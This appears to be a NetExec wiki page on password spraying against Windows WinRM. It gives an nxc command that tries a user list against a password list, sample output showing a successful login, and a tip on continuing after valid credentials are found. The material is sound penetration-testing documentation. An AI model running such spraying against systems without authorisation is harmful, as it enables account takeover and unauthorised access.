🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ”§ NetExec Wiki / Password spraying

Password spraying

Password spraying (without bruteforce)

nxc winrm <target> -u userfile -p passwordfile --no-bruteforce

Expected Results:

WINRM       <target> 5985   ROGER            [*] http://<target>:5985/wsman
WINRM       <target> 5985   ROGER            [-] <domain>\test1:pass1 "Failed to authenticate the user test1 with ntlm"
WINRM       <target> 5985   ROGER            [+] <domain>\<username>:<password> (Pwn3d!)

{% hint style="info" %}
By default nxc will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.
{% endhint %}